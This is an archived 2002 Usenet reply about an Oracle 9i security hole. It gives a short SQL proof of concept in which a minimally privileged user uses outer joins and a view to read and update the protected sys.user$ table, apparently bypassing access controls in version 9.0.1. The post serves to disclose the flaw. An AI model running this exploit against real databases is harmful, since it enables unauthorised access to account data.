Oracle FAQ | Your Portal to the Oracle Knowledge Grid |
Home -> Community -> Usenet -> c.d.o.server -> Re: Oracle 9i DB Security Hole
try this:
create user test identified by test;
grant create session to test;
grant create view to test;
connect test/test;
select *
from sys.user$ left outer join user_users
on sys.user$.name = user_users.username;
create view oh_no as
select sys.user$.name nam
from sys.user$ left outer join sys.ts$
on sys.user$.name = sys.ts$.name;
update oh_no set nam = nam;
rollback;
Anyone relying on v 9.0.1 should know about this, it would seem.
> >Could you please provide at least *some* proof? Obviously you can't.
> >
Received on Wed Apr 17 2002 - 16:25:34 CDT